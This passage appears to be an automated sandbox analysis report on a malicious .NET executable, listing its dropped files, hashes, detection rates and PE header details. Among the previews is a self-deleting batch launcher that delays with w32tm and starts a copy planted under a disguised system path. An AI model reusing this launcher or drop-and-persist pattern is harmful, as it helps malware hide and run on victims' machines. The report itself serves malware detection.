            Preview:inF1Hu38uRYjZHByeiiHD2cB3buFxAFUrPKKMybJi9dhQeuNRhN6QmNqLD8pAxLtME1K70mpHYiEZ4vYrhyQxJEFCe9I0vIuxtVMmjPa4hy1DIQQSj8d955D9wId1ezVPyQpjiwHRYWQUMC3Ns0Qxpv2yRM0awiZrclO1lrtx0MljoswtPPIoiikDY0RV5qez6i1kxCmBGd6cJTJiZGLhZvJ4BLduZX1JsvmG1M6MnHhFmI3Ers5ze7ZKZ7jmj1mslwuXqDrNK93SODR3SYDq

            C:\Recovery\xMLVfJVxhYAkoCJ.exe

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1253376
            Entropy (8bit):6.955347152884786
            Encrypted:false
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            MD5:20CF7F39EDEF3DB30F388829C5A3F05C
            SHA1:009EB186382733844B2D8C5202D0DA9AC1F8DFB0
            SHA-256:2554C3BD1B50FCCF6833EB50179C877A95FCE8135031204E8E678C4D8C5DB89F
            SHA-512:45F488593628CD09BECAC56D0090DC7198B251AC53FB4AFC830073F5B29E3880AA18B84BFB03A9BD6094D4ADCDC11317A1CC664FF5CEA7D7049A5A69EAC18B12
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 79%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Recovery\xMLVfJVxhYAkoCJ.exe:Zone.Identifier

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:false
            Preview:[ZoneTransfer]....ZoneId=0

            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\51c080b3bf3cc1

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with very long lines (539), with no line terminators
            Category:dropped
            Size (bytes):539
            Entropy (8bit):5.871163038020988
            Encrypted:false
            SSDEEP:12:KdsVcf9NpsHvzwX/bV4GYwcUkNmWj8AgphUviHTHsuoVCLhcz:BCVnIvIjVYwLkQk8Ag3S+TMHaa
            MD5:17C701B757496C5AF13EA17145CE40B0
            SHA1:CA8D5F470258086E724BEB1EA1E9A666CC4E037B
            SHA-256:CBAA292B81099091FED48E297DA8B7C751AE7DF7B76A442DBD8EB47FFC36A762
            SHA-512:0766924F28757DF09D785842B12B654A391B357D705128EC8E86D26F0E6A347D9849173F32393DB694F214AE51A65B9CED6E6ABA6850E3A46AEB925CF0A87EC7
            Malicious:false
            Preview:JbVK6hwVcjo4thgUVcACZXEB8akO4QMtrWus2pKoPAYlYm4cKRo0gbHwXTMf7iaLX4NXwybpSVwY8cnWgIDmmVNPO8UjdorqjNOdZgpV08iKptx4p08yfxjBr7Jyd1MnoFzvNK69crwnxCkfLZ4nq2LvoMvcX119w4gj3Brf39WxB5NoWonE7i7w3DHBYemlzx03gBlJsZurfXus8HFtOxBN7up04pGYXv7OEUIUCeViyQQgTZCRY2WCvm5vVvOCSVTuafno8uqucdZqdJhfnz9eY5ccYW9RPSPc6fGxvYToLmjSNPRMNtZdWzVeDLPlvZeKN7u8DutPfVSwWKOJExDg2wGGJltkIr2wHZEPeTId9J7BhjH26Fg8V8Rb1nybAIGxcfo7G8pvojgsyFjke1oDL4aIHmY0frd0DJiB4Kv7avUwcinwEO7IeDmiFgzekyP7GppogipTFqmajopj9mwRtUWAh95YVRXlfWpx28PfinCxaM8a0Pe7C8NvSpHhmQ8yTB4N92qBXQsFRijUAfiFwaj

            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\xMLVfJVxhYAkoCJ.exe

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1253376
            Entropy (8bit):6.955347152884786
            Encrypted:false
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            MD5:20CF7F39EDEF3DB30F388829C5A3F05C
            SHA1:009EB186382733844B2D8C5202D0DA9AC1F8DFB0
            SHA-256:2554C3BD1B50FCCF6833EB50179C877A95FCE8135031204E8E678C4D8C5DB89F
            SHA-512:45F488593628CD09BECAC56D0090DC7198B251AC53FB4AFC830073F5B29E3880AA18B84BFB03A9BD6094D4ADCDC11317A1CC664FF5CEA7D7049A5A69EAC18B12
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 79%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\xMLVfJVxhYAkoCJ.exe:Zone.Identifier

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:false
            Preview:[ZoneTransfer]....ZoneId=0

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Registry.exe.log

            Download File
            Process:C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.370111951859942
            Encrypted:false
            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
            MD5:12C61586CD59AA6F2A21DF30501F71BD
            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\StartMenuExperienceHost.exe.log

            Download File
            Process:C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.370111951859942
            Encrypted:false
            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
            MD5:12C61586CD59AA6F2A21DF30501F71BD
            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

            Download File
            Process:C:\Program Files (x86)\Microsoft.NET\System.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.370111951859942
            Encrypted:false
            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
            MD5:12C61586CD59AA6F2A21DF30501F71BD
            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XPC5PMKegV.exe.log

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1830
            Entropy (8bit):5.3661116947161815
            Encrypted:false
            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
            MD5:FE86BB9E3E84E6086797C4D5A9C909F2
            SHA1:14605A3EA146BAB4EE536375A445B0214CD40A97
            SHA-256:214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
            SHA-512:07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
            Malicious:true
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xMLVfJVxhYAkoCJ.exe.log

            Download File
            Process:C:\Recovery\xMLVfJVxhYAkoCJ.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.370111951859942
            Encrypted:false
            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
            MD5:12C61586CD59AA6F2A21DF30501F71BD
            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

            C:\Users\user\AppData\Local\Temp\bNV1sCNsUH

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):25
            Entropy (8bit):4.323856189774723
            Encrypted:false
            SSDEEP:3:xQfA2g1:xKA2u
            MD5:E1EF6028E4FB119FA25ACEFC7D6F5851
            SHA1:D06BDBA2EAF770C14263FA96533917DD68BE6927
            SHA-256:FEF2C6CA57FDE660EB5F5A544BD5916284120832E5D910335C082FA5958C5248
            SHA-512:F21FE1945035DAC70A89AB6313E69DAA5856ABADD112B3224A5E07C4373A3D774086A1FD28D233988A413762689B4008485BFC34594668832FA0201C94C4C42C
            Malicious:false
            Preview:FGG67Fzdm1oPYEvtflbsExYrM

            C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:DOS batch file, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):251
            Entropy (8bit):5.170984888246542
            Encrypted:false
            SSDEEP:6:hITg3Nou11r+DER5I3uhuAg53BvKOZG1N723fOXBAf:OTg9YDEfThuAg5xEaQBe
            MD5:BF4B8E79A16DB96E0507058BC509294B
            SHA1:EDBB942FB8F80B169BBE51A98DB38B26CB2C178B
            SHA-256:C8088C4985EA23EAF79F2B70DC514DC4149ED3E57DF1FCE8F94B00662387C528
            SHA-512:98557915089F3DEF270FF55D37CFA4355BA0E33167BC377346F3D66871EEEBC16E4483218598208DB87A6A78263969E3B14469D43625701DD8851B4DE6EBFF92
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\yrs7rIEeUp.bat"

            C:\Windows\IdentityCRL\production\51c080b3bf3cc1

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with very long lines (509), with no line terminators
            Category:dropped
            Size (bytes):509
            Entropy (8bit):5.863633043683969
            Encrypted:false
            SSDEEP:12:fQ04ZMgWUdVnJeuE4gUk1V1d61pGOFLAMBdk7FzUfoqd/W6kGQ+TnyADJ:fQ04ZMDYE4hkr+1bLAMf5Pk8nDJ
            MD5:6D28F4A061D5052AD2ABF2548D475BAA
            SHA1:976918A6BD8D9566935E42837B0D0D66F3C60E7F
            SHA-256:37E3241632361E11CF822D4475430702B13EEA687300C962BE72598B040C1C23
            SHA-512:6B3FE2182CAFFB20EA39EE36C783C3BA1884B04DE52EF941EA4CE8D69CCBE6697FA6C50092CCD60BF26DF41598FCBDFE402A633392DA77EDE8103451A2AFF74B
            Malicious:false
            Preview:yezXfYoBrofDH5WpqTKy5QiH9CNXxl0VHwZjcfw9YouYJrOgUO5Ac7ji5sYdKROGyK6UgwNLhKZQfK8RyqCip02JN1otGTzHaoj8v3AhBucRhSCutHpdOpa8RwHoIdEOVR01k9g4pfh5Xll4z3A9nV3uOlr8vWYipO6QcKJukuysIelqKMzPdEkAXFn9ShJTG9PIpVcotPY3hLmt9BxjgJElo62WhJbClelJPdBzuLgNqqcMc3ARujw74odtcFGjxWSCjdegA8zVm148dq3nJKSBsoOk9RWoE7ZTYZn9ZdRwuaVDtfPwLcZnDQU4O3gslKRpbljDC4Op3gQRTL1eCkclhwQHEsvf6jKkJplI5LtROtthADlCCCpAsqHpUc8UIttUVqInksj00KXyCsHBGsc43K1ch6xdMZJeAZMT48cTdzKiTTmmU7NaQybLypFn5FnbB2xngxGIQIaE9TJOTLIPLtOL8BfO2yYXLtgbf9Fg0FJHXWLfg1Uu6YPSn

            C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1253376
            Entropy (8bit):6.955347152884786
            Encrypted:false
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            MD5:20CF7F39EDEF3DB30F388829C5A3F05C
            SHA1:009EB186382733844B2D8C5202D0DA9AC1F8DFB0
            SHA-256:2554C3BD1B50FCCF6833EB50179C877A95FCE8135031204E8E678C4D8C5DB89F
            SHA-512:45F488593628CD09BECAC56D0090DC7198B251AC53FB4AFC830073F5B29E3880AA18B84BFB03A9BD6094D4ADCDC11317A1CC664FF5CEA7D7049A5A69EAC18B12
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 79%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe:Zone.Identifier

            Download File
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:false
            Preview:[ZoneTransfer]....ZoneId=0

            \Device\Null

            Download File
            Process:C:\Windows\System32\w32tm.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):151
            Entropy (8bit):4.791322165551786
            Encrypted:false
            SSDEEP:3:VLV993J+miJWEoJ8FXV6NXXKvo1AFAXaNvj:Vx993DEUDX126X8
            MD5:593AD96BFACA0FE27AEC450F68C2F24A
            SHA1:F2E11F6BC5A2CC6F462897CB9A41A37A0C46690B
            SHA-256:990D28A5F6C810050DE317D3DE94DAAE94AA43912D6C1CD11E0B6A00A144B878
            SHA-512:F8FC98DE0F1FC8AF6ADB789548C5C2D74B36A28C02FBBECF1E99F4D0CB46C135846F3F6A3575E3EF68FFEFF7E3A22A3B42304433204A83BA62F4D479121334D0
            Malicious:false
            Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 28/08/2024 10:52:21..10:52:21, error: 0x80072746.10:52:26, error: 0x80072746.

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Entropy (8bit):6.955347152884786
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
            • Win32 Executable (generic) a (10002005/4) 49.75%
            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
            • Windows Screen Saver (13104/52) 0.07%
            • Win16/32 Executable Delphi generic (2074/23) 0.01%
            File name:XPC5PMKegV.exe
            File size:1'253'376 bytes
            MD5:20cf7f39edef3db30f388829c5a3f05c
            SHA1:009eb186382733844b2d8c5202d0da9ac1f8dfb0
            SHA256:2554c3bd1b50fccf6833eb50179c877a95fce8135031204e8e678c4d8c5db89f
            SHA512:45f488593628cd09becac56d0090dc7198b251ac53fb4afc830073f5b29e3880aa18b84bfb03a9bd6094d4adcdc11317a1cc664ff5cea7d7049a5a69eac18b12
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            TLSH:15455A027E44CA12F40913B7C2EF464847B4A9916AA6E32B7DBA737D55123A73C4CDCB
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6........... ... ....@.. ....................................@................................

            File Icon

            Icon Hash:00928e8e8686b000

            Static PE Info

            General

            Entrypoint:0x5305de
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Time Stamp:0x62DD6184 [Sun Jul 24 15:13:08 2022 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

            Entrypoint Preview

            Instruction
            jmp dword ptr [00402000h]
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x1305900x4b.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1360000x31c.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1380000xc.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text

            Sections

            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
